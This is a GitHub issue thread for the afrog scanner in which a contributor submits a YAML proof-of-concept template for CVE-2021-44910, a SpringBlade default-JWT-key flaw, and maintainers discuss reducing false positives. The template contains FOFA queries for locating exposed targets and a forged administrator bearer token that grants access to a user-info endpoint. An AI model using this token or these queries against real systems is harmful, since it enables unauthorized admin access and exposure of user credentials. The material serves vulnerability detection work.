search

zan8in / afrog

A Security Tool for Bug Bounty, Pentest and Red Teaming.
MIT License
3.39k stars 383 forks source link

CVE-2021-44910 #124

Open leonardo-o1 opened 5 months ago

leonardo-o1 commented 5 months ago

FOFA: body="saber/iconfont.css" || body="Saber 将不能正常工作" || title="Sword Admin" || body="We're sorry but avue-data doesn't work" 验证: image

id: CVE-2021-44910  # 身份标识  和文件名一样  冒号后都有空格

info:   # poc 信息描述   注意缩进 父子关系  yaml语言和python相似  重视格式
  name: SpringBlade 框架JWT认证缺陷漏洞
  author: leo   #作者
  severity: high    # 漏洞等级 info(信息)、low(低危)、medium(中危)、high(高危)、critical(紧急)
  tags: SpringBlade
  verified: true  # true 漏洞已通过验证,false未验证
  description: |    # # 漏洞描述、测绘等    |是yaml语言 多行换行用法
   SpringBlade 框架jwt存在默认key,可任意篡改登录凭证jwt
   FOFA: body="saber/iconfont.css" || body="Saber 将不能正常工作" || title="Sword Admin" || body="We're sorry but avue-data doesn't work"
  reference: # 参考 引用的文章
  - https://forum.butian.net/share/973
  - https://github.com/chillzhuang/blade-tool/blob/master/blade-core-launch/src/main/java/org/springblade/core/launch/constant/TokenConstant.java  #  - 插入列表
  - https://github.com/dockererr/CVE-2021-44910_SpringBlade/blob/main/CVE-2021-44910.py

rules:  #poc 本体 规则集合
  r0:   # 规则名随便起
    request:  # request 请求
      method: GET  # POST  PUT GET
      path: /api/blade-user/info  #路径  api/blade-user/user-list,api/blade-log/api/list
    expression: response.status == 401 && response.body.bcontains(b'"code":401')

  r1:   # 规则名随便起
    request:  # request 请求
      method: GET  # POST  PUT GET
      path: /api/blade-user/info  #路径  api/blade-user/user-list,api/blade-log/api/list
      headers:
          Blade-Auth: bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSJ9.-XHkGTDfmGOdB8DNKwcCgWIfcR8Ln4hs09CVDslv1ATodR2Mjmjrq6KCysoK-sw3zf2EwATzdgxGXNGxfmj9wg
    expression: response.status == 200 && response.body.bcontains(b'"code":200') && response.body.bcontains(b'"success":true')

expression: r0() && r1()
zan8in commented 5 months ago

感谢,不过你的 expression 判断过于简单,容易误报,下次再增加一些唯一性验证会更好。

leonardo-o1 commented 5 months ago

感谢,不过你的 expression 判断过于简单,容易误报,下次再增加一些唯一性验证会更好。

好的,添加了认证前访问401的判断,再看下呢

zan8in commented 5 months ago

不错的办法,这个漏洞之前写过,现已上传到github,你看下是否需要把你的poc 合并进去

ViCrack commented 5 months ago

不用加认证前访问的判断吧,节省发包量,按照这个图来说,因为返回的json结构字段比较多,所以增加字段特征应该就足够了

      - '"success":true'
      - '"account":'
      - '"password":'
      - createDept
      - xxxxxxx
      - xxxxxxxx

图片

nuclei也有这个的yaml